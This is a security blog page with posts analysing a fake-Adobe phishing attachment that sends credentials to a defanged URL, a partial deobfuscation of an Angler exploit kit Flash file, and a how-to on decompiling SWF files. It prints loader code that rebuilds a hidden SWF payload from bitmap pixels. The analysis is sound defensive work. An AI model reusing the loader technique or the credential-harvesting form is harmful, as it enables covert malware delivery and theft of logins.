neonprimetime security , just trying to help: Adobe

Tuesday, February 21, 2017

Customs Banned Goods Adobe Phish

Adobe Phish

From: "CUSTOMS SERVICES"

Attachment: BANNED GOODS.html (md5 e1e0e1d1720dbcc536c2f596d76627d9 , Virus Total has 19/55)

Body: PLEASE FIND THE ATTACHED LIST OF NEWLY BANNED GOODS BY THE GOVERNMENT

Open the attachment and see this pretty convincing page (pic below) with nice background that makes it look like you're in Adobe Reader instead of a browser

It contain the following ...

alert .... Document is Highly Secured by Microsoft INC. Requires Email Authentication: Kindly Sign in with your correct email and password to view Document
title ... PDF Online
form method ... POST ... action= hxxp://send.akataali[.]us/pdnew.php

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0

Thursday, June 2, 2016

Partial Deobfuscation of an Angler EK SWF

I made an attempt to deofuscated and analyze a malicious Adobe Flash SWF file from Malware Traffic Analysis blog about the Angler Exploit kit. I ran through the steps I mentioned to export from the PCAP and turn the SWF file into ActionScript code.

I ended up with this ugly obfuscated mess of ActionScript code. Below is just a sampling, but here is the full obfuscated ActionScript code.

var _local1:* = new ((this.1[IlllI.11IIlI1lIl](IlllI.I11lI1IlI1) as Class))();
var _local2:* = new this.ll1IlI1II1lI()[IlllI.1lIlI1lI];
var _local3:int = _local2[IlllI.1lIIlI1lI1];
var _local4:int = _local2[IlllI.Ill1lI1];
var _local5:uint;
var _local6:uint = (10 - (5 * 2));
var _local7:int;
while (_local7 < _local3) {
_local8 = 0;
while (_local8 < _local4) {
   _local9 = _local2[IlllI.11lIlI](_local7, _local8);
   if ((((_local7 == 0)) && ((_local8 == 0)))){
     _local5 = (_local9 & 0xFFFFFF);
   }

I thought I'd take a stab at de-obfuscating this code, and I was decently successful with unraveling the first layer of obfuscation I thought. I pasted partial deobfuscated code here and thought I'd review some of it below. I deobfuscated it by renaming variables and functionings, removing unnecessary variable declarations and string concatenations, removing unnecessary nested function calls, etc.

public class Document extends MovieClip {
   public function Document(){
    super();
    if (this["stage"]){
      this.functionStartExploit();
    } else {
      this["addEventListener"]("addedToStage", this.functionStartExploit);
    };
   }

Per the above code, when the SWF file loads in the user's browser, it does the standard start for a flash file. It basically waits for the stage (the main area of the SWF) to load, and if it's not loaded yet it adds a listener which will trigger an event as soon as the stage has loaded. Once it's loaded the attacker starts the exploit.

public function functionStartExploit():void{
   this["removeEventListener"]("addedToStage", this.functionStartExploit);
   var _localEmbeddedSWF:* = new flash.display.Loader();
   _localEmbeddedSWF["loadBytes"](this.functionEmbeddedSWFFromBitmap());
   this["addChild"](_localEmbeddedSWF);
}

First the attacker removes the stage listener since it's already loaded now. Then the attacker creates a place holder for a nested SWF file (yes there is essentially a SWF within a SWF). There was an initial layer of obfuscation that involved all the renaming of variables, creating unnecessary string concatenations, etc. But there is a secondary layer of obfuscation that is occurring by loading an embedded SWF file inside this one. So the actual exploit isn't occurring in this SWF that I'm analyzing but in a nested one that appears to have been hidden in a Bitmap file as you'll see below. Once that embedded SWF is loaded, then it's added as a child to this SWF file so that it will load also.

private function functionEmbeddedSWFFromBitmap(){
   var _localMaliciousByteArray:* = new flash.utils.ByteArray();
   var _localBitmap:* = new BitmapAsset()["bitmapData"];
   ...
   while (_localCounter2 < _localBitmap["width"]) {
     while (_localCounterNested < _localBitmap["height"]) {
       _localPixel = _localBitmap["getPixel"](_localCounter2, _localCounterNested);
       ...
       _localMaliciousByteArray["writeByte"]((_localPixel & 0xFF));
       _localMaliciousByteArray["writeByte"](((_localPixel >> 8) & 0xFF));
       _localMaliciousByteArray["writeByte"](((_localPixel >> 16) & 0xFF));
       ...
       _localCounterNested++;
     };
     ...
     _localCounter2++;
   };
   ...
   _localMaliciousByteArray["position"] = 0;
   return (_localMaliciousByteArray);
}

Finally above when loading that embedded SWF from a BitMap file there is some additional altering or messing with the bytes before it's returned back and loaded into that nested location.

I found it interesting to see this nested obfuscation technique in action and it definitely makes it harder to analyze as a security researcher because the exploit you're looking for doesn't even actually exist in this SWF file that we spotted.

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0

Decompile a Adobe Flash SWF File

If you were analyzing a malicious Adobe Flash SWF file, such as the ones mentioned in Brad's Malware Traffic Analysis blog about the Angler Exploit kit, you might be wondering what's actually a good way to analysis that SWF since it's already compiled and unreadable. Well, remember first if you have a PCAP with a SWF file in it, per a previous blog, you need to Export HTTP Object. Now that you have the SWF file it's actually quite easy to decompile and get some Adobe ActionScript code to review. You could use any free online decompiler like showmycode.com to upload the SWF file and it'll spit out immediately for you some ActionScript.

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0